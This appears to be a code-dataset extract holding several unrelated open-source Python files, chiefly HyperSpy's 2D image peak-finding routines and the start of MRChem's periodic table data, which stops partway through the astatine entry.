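#   dirac-wms-get-queue-cpu-time --CPUNormalizationFactor=10.0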
ic-hep/DIRAC
src/DIRAC/WorkloadManagementSystem/scripts/dirac_wms_get_queue_cpu_time.py
Python
gpl-3.0
1,242
[ "DIRAC" ]
0c3754ec10aa4110302668b2f58ff7c1d850055db57120f0a4260a1507da0e8e
# -*- coding: utf-8 -*- # Copyright 2007-2021 The HyperSpy developers # # This file is part of HyperSpy. # # HyperSpy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # HyperSpy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with HyperSpy. If not, see <http://www.gnu.org/licenses/>. import copy from numba import njit import numpy as np import scipy.ndimage as ndi from skimage.feature import blob_dog, blob_log, match_template, peak_local_max from hyperspy.misc.machine_learning import import_sklearn NO_PEAKS = np.array([[np.nan, np.nan]]) @njit(cache=True) def _fast_mean(X): # pragma: no cover """JIT-compiled mean of array. Parameters ---------- X : :py:class:`numpy.ndarray` Input array. Returns ------- mean : float Mean of X. Notes ----- Used by scipy.ndimage.generic_filter in the find_peaks_stat method to reduce overhead of repeated Python function calls. See https://github.com/scipy/scipy/issues/8916 for more details. """ return np.mean(X) @njit(cache=True) def _fast_std(X): # pragma: no cover """JIT-compiled standard deviation of array. Parameters ---------- X : :py:class:`numpy.ndarray` Input array. Returns ------- std : float Standard deviation of X. Notes ----- Used by scipy.ndimage.generic_filter in the find_peaks_stat method to reduce overhead of repeated Python function calls. See https://github.com/scipy/scipy/issues/8916 for more details. """ return np.std(X) def clean_peaks(peaks): """Sort array of peaks and deal with no peaks being found. Parameters ---------- peaks : :py:class:`numpy.ndarray` Array of found peaks. Returns ------- peaks : :py:class:`numpy.ndarray` Sorted array, first by `peaks[:,1]` (y-coordinate) then by `peaks[:,0]` (x-coordinate), of found peaks. NO_PEAKS : str Flag indicating no peaks found. """ if len(peaks) == 0: return NO_PEAKS else: ind = np.lexsort((peaks[:,0], peaks[:,1])) return peaks[ind] def find_local_max(z, **kwargs): """Method to locate positive peaks in an image by local maximum searching. This function wraps :py:func:`skimage.feature.peak_local_max` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. **kwargs : dict Keyword arguments to be passed to the ``peak_local_max`` method of the ``scikit-image`` library. See its documentation for details http://scikit-image.org/docs/dev/api/skimage.feature.html#peak-local-max Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ peaks = peak_local_max(z, **kwargs) return clean_peaks(peaks) def find_peaks_minmax(z, distance=5., threshold=10.): """Method to locate the positive peaks in an image by comparing maximum and minimum filtered images. Parameters ---------- z : numpy.ndarray Matrix of image intensities. distance : float Expected distance between peaks. threshold : float Minimum difference between maximum and minimum filtered images. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. 
""" data_max = ndi.filters.maximum_filter(z, distance) maxima = (z == data_max) data_min = ndi.filters.minimum_filter(z, distance) diff = ((data_max - data_min) > threshold) maxima[diff == 0] = 0 labeled, num_objects = ndi.label(maxima) peaks = np.array( ndi.center_of_mass(z, labeled, range(1, num_objects + 1))) return clean_peaks(np.round(peaks).astype(int)) def find_peaks_max(z, alpha=3., distance=10): """Method to locate positive peaks in an image by local maximum searching. Parameters ---------- alpha : float Only maxima above `alpha * sigma` are found, where `sigma` is the standard deviation of the image. distance : int When a peak is found, all pixels in a square region of side `2 * distance` are set to zero so that no further peaks can be found in that region. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ # preallocate lots of peak storage k_arr = [] # copy image image_temp = copy.deepcopy(z) peak_ct = 0 # calculate standard deviation of image for thresholding sigma = np.std(z) while True: k = np.argmax(image_temp) j, i = np.unravel_index(k, image_temp.shape) if image_temp[j, i] >= alpha * sigma: k_arr.append([j, i]) # masks peaks already identified. x = np.arange(i - distance, i + distance) y = np.arange(j - distance, j + distance) xv, yv = np.meshgrid(x, y) # clip to handle peaks near image edge image_temp[yv.clip(0, image_temp.shape[0] - 1), xv.clip(0, image_temp.shape[1] - 1)] = 0 peak_ct += 1 else: break peaks = np.array(k_arr) return clean_peaks(peaks) def find_peaks_zaefferer(z, grad_threshold=0.1, window_size=40, distance_cutoff=50.): """Method to locate positive peaks in an image based on gradient thresholding and subsequent refinement within masked regions. Parameters ---------- z : :py:class:`numpy.ndarray` Matrix of image intensities. grad_threshold : float The minimum gradient required to begin a peak search. window_size : int The size of the square window within which a peak search is conducted. If odd, will round down to even. The size must be larger than 2. distance_cutoff : float The maximum distance a peak may be from the initial high-gradient point. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- Implemented as described in Zaefferer "New developments of computer-aided crystallographic analysis in transmission electron microscopy" J. Ap. Cryst. This version by Ben Martineau (2016) """ def box(x, y, window_size, x_max, y_max): """Produces a list of coordinates in the box about (x, y).""" a = int(window_size / 2) x_min = max(0, x - a) x_max = min(x_max, x + a) y_min = max(0, y - a) y_max = min(y_max, y + a) return np.mgrid[x_min:x_max, y_min:y_max].reshape(2, -1, order="F") def get_max(image, box): """Finds the coordinates of the maximum of 'image' in 'box'.""" vals = image[tuple(box)] ind = np.argmax(vals) return tuple(box[:, ind]) def squared_distance(x, y): """Calculates the squared distance between two points.""" return (x[0] - y[0]) ** 2 + (x[1] - y[1]) ** 2 def gradient(image): """Calculates the square of the 2-d partial gradient. Parameters ---------- image : :py:class:`numpy.ndarray` The image for which the gradient will be calculated. Returns ------- gradient_of_image : :py:class:`numpy.ndarray` The gradient of the image. """ gradient_of_image = np.gradient(image) gradient_of_image = gradient_of_image[0] ** 2 + gradient_of_image[ 1] ** 2 return gradient_of_image # Check window size is appropriate. 
if window_size < 2: raise ValueError("`window_size` must be >= 2.") # Generate an ordered list of matrix coordinates. if len(z.shape) != 2: raise ValueError("'z' should be a 2-d image matrix.") z = z / np.max(z) coordinates = np.indices(z.data.shape).reshape(2, -1).T # Calculate the gradient at every point. image_gradient = gradient(z) # Boolean matrix of high-gradient points. coordinates = coordinates[(image_gradient >= grad_threshold).flatten()] # Compare against squared distance (avoids repeated sqrt calls) distance_cutoff_sq = distance_cutoff ** 2 peaks = [] for coordinate in coordinates: # Iterate over coordinates where the gradient is high enough. b = box(coordinate[0], coordinate[1], window_size, z.shape[0], z.shape[1]) p_old = (0, 0) p_new = get_max(z, b) while p_old[0] != p_new[0] and p_old[1] != p_new[1]: p_old = p_new b = box(p_old[0], p_old[1], window_size, z.shape[0], z.shape[1]) p_new = get_max(z, b) if squared_distance(coordinate, p_new) > distance_cutoff_sq: break peaks.append(p_new) peaks = np.array([p for p in set(peaks)]) return clean_peaks(peaks) def find_peaks_stat(z, alpha=1.0, window_radius=10, convergence_ratio=0.05): """Method to locate positive peaks in an image based on statistical refinement and difference with respect to mean intensity. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. alpha : float Only maxima above `alpha * sigma` are found, where `sigma` is the local, rolling standard deviation of the image. window_radius : int The pixel radius of the circular window for the calculation of the rolling mean and standard deviation. convergence_ratio : float The algorithm will stop finding peaks when the proportion of new peaks being found is less than `convergence_ratio`. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- Implemented as described in the PhD thesis of Thomas White, University of Cambridge, 2009, with minor modifications to resolve ambiguities. The algorithm is as follows: 1. Adjust the contrast and intensity bias of the image so that all pixels have values between 0 and 1. 2. For each pixel, determine the mean and standard deviation of all pixels inside a circle of radius 10 pixels centered on that pixel. 3. If the value of the pixel is greater than the mean of the pixels in the circle by more than one standard deviation, set that pixel to have an intensity of 1. Otherwise, set the intensity to 0. 4. Smooth the image by convovling it twice with a flat 3x3 kernel. 5. Let k = (1/2 - mu)/sigma where mu and sigma are the mean and standard deviations of all the pixel intensities in the image. 6. For each pixel in the image, if the value of the pixel is greater than mu + k*sigma set that pixel to have an intensity of 1. Otherwise, set the intensity to 0. 7. Detect peaks in the image by locating the centers of gravity of regions of adjacent pixels with a value of 1. 8. Repeat #4-7 until the number of peaks found in the previous step converges to within the user defined convergence_ratio. 
""" if not import_sklearn.sklearn_installed: raise ImportError("This method requires scikit-learn.") def normalize(image): """Scales the image to intensities between 0 and 1.""" return image / np.max(image) def _local_stat(image, radius, func): """Calculates rolling method 'func' over a circular kernel.""" x, y = np.ogrid[-radius : radius + 1, -radius : radius + 1] kernel = np.hypot(x, y) < radius stat = ndi.filters.generic_filter(image, func, footprint=kernel) return stat def local_mean(image, radius): """Calculates rolling mean over a circular kernel.""" return _local_stat(image, radius, _fast_mean) def local_std(image, radius): """Calculates rolling standard deviation over a circular kernel.""" return _local_stat(image, radius, _fast_std) def single_pixel_desensitize(image): """Reduces single-pixel anomalies by nearest-neighbor smoothing.""" kernel = np.array([[0.5, 1, 0.5], [1, 1, 1], [0.5, 1, 0.5]]) smoothed_image = ndi.filters.generic_filter(image, _fast_mean, footprint=kernel) return smoothed_image def stat_binarise(image): """Peaks more than one standard deviation from the mean set to one.""" image_rolling_mean = local_mean(image, window_radius) image_rolling_std = local_std(image, window_radius) image = single_pixel_desensitize(image) binarised_image = np.zeros(image.shape) stat_mask = image > (image_rolling_mean + alpha * image_rolling_std) binarised_image[stat_mask] = 1 return binarised_image def smooth(image): """Image convolved twice using a uniform 3x3 kernel.""" image = ndi.filters.uniform_filter(image, size=3) image = ndi.filters.uniform_filter(image, size=3) return image def half_binarise(image): """Image binarised about values of one-half intensity.""" binarised_image = np.where(image > 0.5, 1, 0) return binarised_image def separate_peaks(binarised_image): """Identify adjacent 'on' coordinates via DBSCAN.""" bi = binarised_image.astype("bool") coordinates = np.indices(bi.shape).reshape(2, -1).T[bi.flatten()] db = import_sklearn.sklearn.cluster.DBSCAN(2, min_samples=3) peaks = [] if coordinates.shape[0] > 0: # we have at least some peaks labeled_points = db.fit_predict(coordinates) for peak_label in list(set(labeled_points)): peaks.append(coordinates[labeled_points == peak_label]) return peaks def _peak_find_once(image): """Smooth, binarise, and find peaks according to main algorithm.""" image = smooth(image) # 4 image = half_binarise(image) # 5 peaks = separate_peaks(image) # 6 centers = np.array([np.mean(peak, axis=0) for peak in peaks]) # 7 return image, centers def stat_peak_finder(image, convergence_ratio): """Find peaks in image. Algorithm stages in comments.""" # Image preparation image = normalize(image) # 1 image = stat_binarise(image) # 2, 3 # Perform first iteration of peak finding image, peaks_curr = _peak_find_once(image) # 4-7 n_peaks = len(peaks_curr) if n_peaks == 0: return peaks_curr m_peaks = 0 # Repeat peak finding with more blurring to convergence while (n_peaks - m_peaks) / n_peaks > convergence_ratio: # 8 m_peaks = n_peaks peaks_old = np.copy(peaks_curr) image, peaks_curr = _peak_find_once(image) n_peaks = len(peaks_curr) if n_peaks == 0: return peaks_old return peaks_curr return clean_peaks(stat_peak_finder(z, convergence_ratio)) def find_peaks_dog(z, min_sigma=1., max_sigma=50., sigma_ratio=1.6, threshold=0.2, overlap=0.5, exclude_border=False): """Method to locate peaks via the Difference of Gaussian Matrices method. 
This function wraps :py:func:`skimage.feature.blob_dog` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` 2-d array of intensities min_sigma, max_sigma, sigma_ratio, threshold, overlap, exclude_border : Additional parameters to be passed to the algorithm. See `blob_dog` documentation for details: http://scikit-image.org/docs/dev/api/skimage.feature.html#blob-dog Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. Notes ----- While highly effective at finding even very faint peaks, this method is sensitive to fluctuations in intensity near the edges of the image. """ z = z / np.max(z) blobs = blob_dog(z, min_sigma=min_sigma, max_sigma=max_sigma, sigma_ratio=sigma_ratio, threshold=threshold, overlap=overlap, exclude_border=exclude_border) try: centers = np.round(blobs[:, :2]).astype(int) except IndexError: return NO_PEAKS clean_centers = [] for center in centers: if len(np.intersect1d(center, (0, 1) + z.shape + tuple( c - 1 for c in z.shape))) > 0: continue clean_centers.append(center) return clean_peaks(np.array(clean_centers)) def find_peaks_log(z, min_sigma=1., max_sigma=50., num_sigma=10, threshold=0.2, overlap=0.5, log_scale=False, exclude_border=False): """Method to locate peaks via the Laplacian of Gaussian Matrices method. This function wraps :py:func:`skimage.feature.blob_log` function and sorts the results for consistency with other peak finding methods. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. min_sigma, max_sigma, num_sigma, threshold, overlap, log_scale, exclude_border : Additional parameters to be passed to the ``blob_log`` method of the ``scikit-image`` library. See its documentation for details: http://scikit-image.org/docs/dev/api/skimage.feature.html#blob-log Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Peak pixel coordinates. """ z = z / np.max(z) if isinstance(num_sigma, float): raise ValueError("`num_sigma` parameter should be an integer.") blobs = blob_log(z, min_sigma=min_sigma, max_sigma=max_sigma, num_sigma=num_sigma, threshold=threshold, overlap=overlap, log_scale=log_scale, exclude_border=exclude_border) # Attempt to return only peak positions. If no peaks exist, return an # empty array. try: centers = np.round(blobs[:, :2]).astype(int) ind = np.lexsort((centers[:,0], centers[:,1])) except IndexError: return NO_PEAKS return centers[ind] def find_peaks_xc(z, template, distance=5, threshold=0.5, **kwargs): """Find peaks in the cross correlation between the image and a template by using the :py:func:`~hyperspy.utils.peakfinders2D.find_peaks_minmax` function to find the peaks on the cross correlation result obtained using the :py:func:`skimage.feature.match_template` function. Parameters ---------- z : :py:class:`numpy.ndarray` Array of image intensities. template : numpy.ndarray (square) Array containing a single bright disc, similar to those to detect. distance : float Expected distance between peaks. threshold : float Minimum difference between maximum and minimum filtered images. **kwargs : dict Keyword arguments to be passed to the :py:func:`skimage.feature.match_template` function. Returns ------- peaks : :py:class:`numpy.ndarray` of shape (n_peaks, 2) Array of peak coordinates. 
""" pad_input = kwargs.pop('pad_input', True) response_image = match_template(z, template, pad_input=pad_input, **kwargs) peaks = find_peaks_minmax(response_image, distance=distance, threshold=threshold) return clean_peaks(peaks)
thomasaarholt/hyperspy
hyperspy/utils/peakfinders2D.py
Python
gpl-3.0
20,090
[ "Gaussian" ]
ed57635893ff8dac9623521d97c81d8dd86908662407699fd888b2bc2ee14563
import menu import newgame import galaxy import planet import star import research
jespino/GalaxduS
libs/screens/__init__.py
Python
gpl-3.0
83
[ "Galaxy" ]
0aff78a4e9362f84eb1aeed459267b8e5eb6314560713924dac258bdea36695a
# # MRChem, a numerical real-space code for molecular electronic structure # calculations within the self-consistent field (SCF) approximations of quantum # chemistry (Hartree-Fock and Density Functional Theory). # Copyright (C) 2021 Stig Rune Jensen, Luca Frediani, Peter Wind and contributors. # # This file is part of MRChem. # # MRChem is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # MRChem is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with MRChem. If not, see <https://www.gnu.org/licenses/>. # # For information on the complete list of contributors to MRChem, see: # <https://mrchem.readthedocs.io/> # from collections import OrderedDict, namedtuple class Element( namedtuple( "Element", "radius covalent Z mass symbol bpt mpt density volume name debye a crystal cpera conf", ) ): __slots__ = () def __new__(cls, iterable): return super(cls, Element).__new__( cls, radius=float(iterable[0]), covalent=float(iterable[1]), Z=int(iterable[2]), mass=float(iterable[3]), symbol=iterable[4], bpt=float(iterable[5]), mpt=float(iterable[6]), density=float(iterable[7]), volume=float(iterable[8]), name=iterable[9], debye=float(iterable[10]), a=float(iterable[11]), crystal=iterable[12], cpera=float(iterable[13]), conf=iterable[14], ) def __str__(self): return "{:s} ({:s}): {{{:s}}}, Z={:d}, m={:f}".format( self.name, self.symbol, self.conf, self.Z, self.mass ) PeriodicTable = OrderedDict({ 'h': Element([ '0.79', '0.32', '1', '1.00794', 'H', '20.268', '14.025', '0.0899', '14.4', 'Hydrogen', '110.0', '3.75', 'HEX', '1.731', '1s1' ]), 'he': Element([ '0.49', '0.93', '2', '4.002602', 'He', '4.215', '0.95', '0.1787', '0.0', 'Helium', '-26.0', '3.57', 'HEX', '1.633', '1s2' ]), 'li': Element([ '2.05', '1.23', '3', '6.941', 'Li', '1615', '453.7', '0.53', '13.10', 'Lithium', '400.0', '3.49', 'BCC', '0.00', '1s2_2s1' ]), 'be': Element([ '1.40', '0.90', '4', '9.012182', 'Be', '2745', '1560.0', '1.85', '5.0', 'Beryllium', '1000.0', '2.29', 'HEX', '1.567', '1s2_2s2' ]), 'b': Element([ '1.17', '0.82', '5', '10.811', 'B', '4275', '2300.0', '2.34', '4.6', 'Boron', '1250.0', '8.73', 'TET', '0.576', '1s2_2s2_2p1' ]), 'c': Element([ '0.91', '0.77', '6', '12.011', 'C', '4470.0', '4100.0', '2.62', '4.58', 'Carbon', '1860.0', '3.57', 'DIA', '0.00', '1s2_2s2_2p2' ]), 'n': Element([ '0.75', '0.75', '7', '14.00674', 'N', '77.35', '63.14', '1.251', '17.3', 'Nitrogen', '-79.0', '4.039', 'HEX', '1.651', '1s2_2s2_2p3' ]), 'o': Element([ '0.65', '0.73', '8', '15.9994', 'O', '90.18', '50.35', '1.429', '14.0', 'Oxygen', '-46.0', '6.83', 'CUB', '0.00', '1s2_2s2_2p4' ]), 'f': Element([ '0.57', '0.72', '9', '18.9984032', 'F', '84.95', '53.48', '1.696', '17.1', 'Fluorine', '0.0', '0.00', 'MCL', '0.00', '1s2_2s2_2p5' ]), 'ne': Element([ '0.51', '0.71', '10', '20.1797', 'Ne', '27.096', '24.553', '0.901', '16.7', 'Neon', '63.0', '4.43', 'FCC', '0.00', '1s2_2s2_2p6' ]), 'na': Element([ '2.23', '1.54', '11', '22.989768', 'Na', '1156', '371.0', '0.97', '23.7', 'Sodium', '150.0', '4.23', 'BCC', '0.00', '[Ne]3s1' ]), 'mg': Element([ '1.72', '1.36', '12', '24.3050', 'Mg', '1363', '922', '1.74', 
'13.97', 'Magnesium', '318.0', '3.21', 'HEX', '1.624', '[Ne]3s2' ]), 'al': Element([ '1.82', '1.18', '13', '26.981539', 'Al', '2793', '933.25', '2.70', '10.0', 'Aluminum', '394.0', '4.05', 'FCC', '0.00', '[Ne]3s2_3p1' ]), 'si': Element([ '1.46', '1.11', '14', '28.0855', 'Si', '3540.0', '1685', '2.33', '12.1', 'Silicon', '625.0', '5.43', 'DIA', '0.00', '[Ne]3s2_3p2' ]), 'p': Element([ '1.23', '1.06', '15', '30.97362', 'P', '550.0', '317.30', '1.82', '17.0', 'Phosphorus', '0.0', '7.17', 'CUB', '0.00', '[Ne]3s2_3p3' ]), 's': Element([ '1.09', '1.02', '16', '32.066', 'S', '717.75', '388.36', '2.07', '15.5', 'Sulfur', '0.0', '10.47', 'ORC', '0.00', '[Ne]3s2_3p4' ]), 'cl': Element([ '0.97', '0.99', '17', '35.4527', 'Cl', '239.1', '172.16', '3.17', '22.7', 'Chlorine', '0.0', '6.24', 'ORC', '0.00', '[Ne]3s2_3p5' ]), 'ar': Element([ '0.88', '0.98', '18', '39.948', 'Ar', '87.30', '83.81', '1.784', '28.5', 'Argon', '85.0', '5.26', 'FCC', '0.00', '[Ne]3s2_3p6' ]), 'k': Element([ '2.77', '2.03', '19', '39.0983', 'K', '1032', '336.35', '0.86', '45.46', 'Potassium', '100.0', '5.23', 'BCC', '0.00', '[Ar]4s1' ]), 'ca': Element([ '2.23', '1.91', '20', '40.078', 'Ca', '1757', '1112', '1.55', '29.9', 'Calcium', '230.0', '5.58', 'FCC', '0.00', '[Ar]4s2' ]), 'sc': Element([ '2.09', '1.62', '21', '44.955910', 'Sc', '3104', '1812', '3.0', '15.0', 'Scandium', '-359.0', '3.31', 'HEX', '1.594', '[Ar]3d1_4s2' ]), 'ti': Element([ '2.00', '1.45', '22', '47.88', 'Ti', '3562', '1943', '4.50', '10.64', 'Titanium', '380.0', '2.95', 'HEX', '1.588', '[Ar]3d2_4s2' ]), 'v': Element([ '1.92', '1.34', '23', '50.9415', 'V', '3682', '2175', '5.8', '8.78', 'Vanadium', '390.0', '3.02', 'BCC', '0.00', '[Ar]3d3_4s2' ]), 'cr': Element([ '1.85', '1.18', '24', '51.9961', 'Cr', '2945', '2130.0', '7.19', '7.23', 'Chromium', '460.0', '2.88', 'BCC', '0.00', '[Ar]3d5_4s1' ]), 'mn': Element([ '1.79', '1.17', '25', '54.93085', 'Mn', '2335', '1517', '7.43', '1.39', 'Manganese', '400.0', '8.89', 'CUB', '0.00', '[Ar]3d5_4s2' ]), 'fe': Element([ '1.72', '1.17', '26', '55.847', 'Fe', '3135', '1809', '7.86', '7.1', 'Iron', '460.0', '2.87', 'BCC', '0.00', '[Ar]3d6_4s2' ]), 'co': Element([ '1.67', '1.16', '27', '58.93320', 'Co', '3201', '1768', '8.90', '6.7', 'Cobalt', '385.0', '2.51', 'HEX', '0.00', '[Ar]3d7_4s2' ]), 'ni': Element([ '1.62', '1.15', '28', '58.69', 'Ni', '3187', '1726', '8.90', '6.59', 'Nickel', '375.0', '3.52', 'FCC', '0.00', '[Ar]3d8_4s2' ]), 'cu': Element([ '1.57', '1.17', '29', '63.546', 'Cu', '2836', '1357.6', '8.96', '7.1', 'Copper', '315.0', '3.61', 'FCC', '0.00', '[Ar]3d10_4s1' ]), 'zn': Element([ '1.53', '1.25', '30', '65.39', 'Zn', '1180.0', '692.73', '7.14', '9.2', 'Zinc', '234.0', '2.66', 'HEX', '0.00', '[Ar]3d10_4s2' ]), 'ga': Element([ '1.81', '1.26', '31', '69.723', 'Ga', '2478', '302.90', '5.91', '11.8', 'Gallium', '240.0', '4.51', 'ORC', '0.00', '[Ar]3d10_4s2_4p1' ]), 'ge': Element([ '1.52', '1.22', '32', '72.61', 'Ge', '3107', '1210.4', '5.32', '13.6', 'Germanium', '360.0', '5.66', 'DIA', '0.00', '[Ar]3d10_4s2_4p2' ]), 'as': Element([ '1.33', '1.20', '33', '74.92159', 'As', '876', '1081', '5.72', '13.1', 'Arsenic', '285.0', '4.13', 'RHL', '54.16', '[Ar]3d10_4s2_4p3' ]), 'se': Element([ '1.22', '1.16', '34', '78.96', 'Se', '958', '494', '4.80', '16.45', 'Selenium', '-150.0', '4.36', 'HEX', '0.00', '[Ar]3d10_4s2_4p4' ]), 'br': Element([ '1.12', '1.14', '35', '79.904', 'Br', '332.25', '265.90', '3.12', '23.5', 'Bromine', '0.0', '6.67', 'ORC', '0.00', '[Ar]3d10_4s2_4p5' ]), 'kr': Element([ '1.03', '1.12', '36', '83.80', 
'Kr', '119.80', '115.78', '3.74', '38.9', 'Krypton', '-73.0', '5.72', 'FCC', '0.00', '[Ar]3d10_4s2_4p6' ]), 'rb': Element([ '2.98', '2.16', '37', '85.4678', 'Rb', '961', '312.64', '1.53', '55.9', 'Rubidium', '-56.0', '5.59', 'BCC', '0.00', '[Kr]5s1' ]), 'sr': Element([ '2.45', '1.91', '38', '87.62', 'Sr', '1650.0', '1041', '2.6', '33.7', 'Strontium', '-147.0', '6.08', 'FCC', '0.00', '[Kr]5s2' ]), 'y': Element([ '2.27', '1.62', '39', '88.90585', 'Y', '3611', '1799', '4.5', '19.8', 'Yttrium', '-256.0', '3.65', 'HEX', '1.571', '[Kr]4d1_5s2' ]), 'zr': Element([ '2.16', '1.45', '40', '91.224', 'Zr', '4682', '2125', '6.49', '14.1', 'Zirconium', '250.0', '3.23', 'HEX', '1.593', '[Kr]4d2_5s2' ]), 'nb': Element([ '2.09', '1.34', '41', '92.90638', 'Nb', '5017', '2740.0', '8.55', '10.87', 'Niobium', '275.0', '3.30', 'BCC', '0.00', '[Kr]4d4_5s1' ]), 'mo': Element([ '2.01', '1.30', '42', '95.94', 'Mo', '4912', '2890.0', '10.2', '9.4', 'Molybdenum', '380.0', '3.15', 'BCC', '0.00', '[Kr]4d5_5s1' ]), 'tc': Element([ '1.95', '1.27', '43', '-98', 'Tc', '4538', '2473', '11.5', '8.5', 'Technetium', '0.0', '2.74', 'HEX', '1.604', '[Kr]4d5_5s2' ]), 'ru': Element([ '1.89', '1.25', '44', '101.07', 'Ru', '4423', '2523', '12.2', '8.3', 'Ruthenium', '-382.0', '2.70', 'HEX', '1.584', '[Kr]4d7_5s1' ]), 'rh': Element([ '1.83', '1.25', '45', '102.90550', 'Rh', '3970.0', '2236', '12.4', '8.3', 'Rhodium', '-350.0', '3.80', 'FCC', '0.00', '[Kr]4d8_5s1' ]), 'pd': Element([ '1.79', '1.28', '46', '106.42', 'Pd', '3237', '1825', '12.0', '8.9', 'Palladium', '275.0', '3.89', 'FCC', '0.00', '[Kr]4d10_5s0' ]), 'ag': Element([ '1.75', '1.34', '47', '107.8682', 'Ag', '2436', '1234', '10.5', '10.3', 'Silver', '215.0', '4.09', 'FCC', '0.00', '[Kr]4d10_5s1' ]), 'cd': Element([ '1.71', '1.48', '48', '112.411', 'Cd', '1040.0', '594.18', '8.65', '13.1', 'Cadmium', '120.0', '2.98', 'HEX', '1.886', '[Kr]4d10_5s2' ]), 'in': Element([ '2.00', '1.44', '49', '114.82', 'In', '2346', '429.76', '7.31', '15.7', 'Indium', '129.0', '4.59', 'TET', '1.076', '[Kr]4d10_5s2_5p1' ]), 'sn': Element([ '1.72', '1.41', '50', '118.710', 'Sn', '2876', '505.06', '7.30', '16.3', 'Tin', '170.0', '5.82', 'TET', '0.546', '[Kr]4d10_5s2_5p2' ]), 'sb': Element([ '1.53', '1.40', '51', '121.75', 'Sb', '1860.0', '904', '6.68', '18.23', 'Antimony', '200.0', '4.51', 'RHL', '57.10', '[Kr]4d10_5s2_5p3' ]), 'te': Element([ '1.42', '1.36', '52', '127.60', 'Te', '1261', '722.65', '6.24', '20.5', 'Tellurium', '-139.0', '4.45', 'HEX', '1.33', '[Kr]4d10_5s2_5p4' ]), 'i': Element([ '1.32', '1.33', '53', '126.90447', 'I', '458.4', '386.7', '4.92', '25.74', 'Iodine', '0.0', '7.27', 'ORC', '0.00', '[Kr]4d10_5s2_5p5' ]), 'xe': Element([ '1.24', '1.31', '54', '131.29', 'Xe', '165.03', '161.36', '5.89', '37.3', 'Xenon', '-55.0', '6.20', 'FCC', '0.00', '[Kr]4d10_5s2_5p6' ]), 'cs': Element([ '3.34', '2.35', '55', '132.90543', 'Cs', '944', '301.55', '1.87', '71.07', 'Cesium', '-40.0', '6.05', 'BCC', '0.00', '[Xe]6s1' ]), 'ba': Element([ '2.78', '1.98', '56', '137.327', 'Ba', '2171', '1002', '3.5', '39.24', 'Barium', '-110.0', '5.02', 'BCC', '0.00', '[Xe]6s2' ]), 'la': Element([ '2.74', '1.69', '57', '138.9055', 'La', '3730.0', '1193', '6.7', '20.73', 'Lanthanum', '132.0', '3.75', 'HEX', '1.619', '[Xe]5d1_6s2' ]), 'hf': Element([ '2.16', '1.44', '72', '178.49', 'Hf', '4876', '2500.0', '13.1', '13.6', 'Hafnium', '0.0', '3.20', 'HEX', '1.582', '[Xe]4f14_5d2_6s2' ]), 'ta': Element([ '2.09', '1.34', '73', '180.9479', 'Ta', '5731', '3287', '16.6', '10.90', 'Tantalum', '225.0', '3.31', 'BCC', 
'0.00', '[Xe]4f14_5d3_6s2' ]), 'w': Element([ '2.02', '1.30', '74', '183.85', 'W', '5828', '3680.0', '19.3', '9.53', 'Tungsten', '310.0', '3.16', 'BCC', '0.00', '[Xe]4f14_5d4_6s2' ]), 're': Element([ '1.97', '1.28', '75', '186.207', 'Re', '5869', '3453', '21.0', '8.85', 'Rhenium', '416.0', '2.76', 'HEX', '1.615', '[Xe]4f14_5d5_6s2' ]), 'os': Element([ '1.92', '1.26', '76', '190.2', 'Os', '5285', '3300.0', '22.4', '8.49', 'Osmium', '-400.0', '2.74', 'HEX', '1.579', '[Xe]4f14_5d6_6s2' ]), 'ir': Element([ '1.87', '1.27', '77', '192.22', 'Ir', '4701', '2716', '22.5', '8.54', 'Iridium', '430.0', '3.84', 'FCC', '0.00', '[Xe]4f14_5d7_6s2' ]), 'pt': Element([ '1.83', '1.30', '78', '195.08', 'Pt', '4100.0', '2045', '21.4', '9.10', 'Platinum', '230.0', '3.92', 'FCC', '0.00', '[Xe]4f14_5d10_6s0' ]), 'au': Element([ '1.79', '1.34', '79', '196.96654', 'Au', '3130.0', '1337.58', '19.3', '10.2', 'Gold', '170.0', '4.08', 'FCC', '0.00', '[Xe]4f14_5d10_6s1' ]), 'hg': Element([ '1.76', '1.49', '80', '200.59', 'Hg', '630.0', '234.28', '13.53', '14.82', 'Mercury', '100.0', '2.99', 'RHL', '70.75', '[Xe]4f14_5d10_6s2' ]), 'tl': Element([ '2.08', '1.48', '81', '204.3833', 'Tl', '1746', '577', '11.85', '17.2', 'Thallium', '96.0', '3.46', 'HEX', '1.599', '[Xe]4f14_5d10_6s2_6p1' ]), 'pb': Element([ '1.81', '1.47', '82', '207.2', 'Pb', '2023', '600.6', '11.4', '18.17', 'Lead', '88.0', '4.95', 'FCC', '0.00', '[Xe]4f14_5d10_6s2_6p2' ]), 'bi': Element([ '1.63', '1.46', '83', '208.98037', 'Bi', '1837', '544.52', '9.8', '21.3', 'Bismuth', '120.0', '4.75', 'RHL', '57.23', '[Xe]4f14_5d10_6s2_6p3' ]), 'po': Element([ '1.53', '1.46', '84', '-209', 'Po', '1235', '527', '9.4', '22.23', 'Polonium', '0.0', '3.35', 'SC', '0.00', '[Xe]4f14_5d10_6s2_6p4' ]), 'at': Element([ '1.43', '1.45', '85', 